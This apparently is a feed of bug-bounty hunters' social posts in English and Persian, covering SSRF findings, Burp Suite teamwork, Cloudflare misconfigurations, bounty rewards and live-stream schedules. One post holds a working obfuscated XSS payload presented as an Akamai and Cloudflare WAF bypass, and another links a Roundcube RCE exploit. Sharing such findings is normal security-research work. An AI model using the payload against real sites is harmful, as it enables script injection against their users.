Bypass SSRF protection with different encodings. A thread. 🧵👇

Enhance your #BugBounty toolkit with: 1. Integrating comprehensive API unit tests to ensure endpoint reliability 2. Validating request/response DTOs for seamless data contracts 3. Employing Tree-sitter for precise JavaScript parsing and AST analysis

JS files are important, but without understanding the web app architecture, they’re not enough. Instead of just hunting javascript, focus on the architecture. I’m not a hunter, just a suggestion! #bugbountytips #bugbountytip Poria 😏

ماه خوبی بود 🧑🏻‍🦼 هنوز ۷ تاش تو راهه🧑🏻‍🦼 nader abdi 😘❤️❤️❤️ @AliHz1337 😘❤️ Mohammad rasool 😘❤️

One of the main challenges in team collaboration with Burp Suite is the lack of data synchronization between members. The idea we have is to sync the site map, save Repeater logs, and show teammates' activities to improve teamwork. Gareth Heyes \u2028

Misconfigurations in Cloudflare Zero Trust policies are more common than you think! Out of 1000 tested sites, more than 50 were vulnerable due to improper policy configurations. Check your settings before attackers do! #Cloudflare #ZeroTrust #Security

گزارش critical رو گوگل باشه؟ 🤌🏻😏 nader abdi Mohammad rasool @AliHz1337

I’ve just shared a new write-up! A small curiosity turned into a full-blown SSRF — internal access, exposed data, and deep exploration. Read it here: medium.com/@skycer_00/ful… #BugBounty

SSRF → Internal IP Leak ( 80% it could be it ) Yesterday, after reporting an SSRF vulnerability to Cloudflare, I decided to revisit it to see if I could chain it into something more impactful. Nothing worked, until I started digging into the HTTP callback behavior.

I just found a WAF bypass for Akamai and Cloudflare: <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>

CVE-2025-49113 – Roundcube Webmail RCE Exploit exploitfinder.com/dbexploit/expl…

Back in the game after a long break 🎯 Even without finding a bug, discovering a hidden and undocumented endpoint feels rewarding. You don’t always need an exploit — sometimes the hunt itself is the real win. Poria 😘😘😘

Today I received the gift sent by Google VRP. Thank you so much for the beautiful hoodies you sent me. Google VRP (Google Bug Hunters) & Google ❤️❤️ nader abdi ❤️😘❤️😘❤️ #BugBounty

I’d rather not say anything about the picture below — it’s better if you see it yourself🤌🏻🤌🏻 nader abdi 😘😘😘😘😘🫂

losingAFewPackets redd.it/1nwcmp4

قراره تو یه ایونت، تجربه‌هامون از هانت کردن روی متا(فیسبوک، اینستاگرام،...) و تکنولوژی‌هایی که متا استفاده می‌کنه ابزار های که توسعه داده شده رو باهاتون به اشتراک بذاریم! زمان لایو برا هفته آینده اس تایم دقیق هم خود چنل میذاریم. 📺 سه تا لایو داریم که با Poria ❤️ به‌صورت

قسمت اول لایو، چهارشنبه ۲۱ آبان ساعت ۸ شب شد. سرفصل های قسمت ۱،۲ هم مشخصه🙏

لایو امشب ساعت 8 شروع میشه کسایی که هنوز جوین ندادن میتونن جوین دیسکورد بدن discord.gg/gRgv3MBBv6

قسمت دوم لایو، جمعه ساعت ۸ شب شد. باشین که کلی بحث در مورد اتومیشن داریم.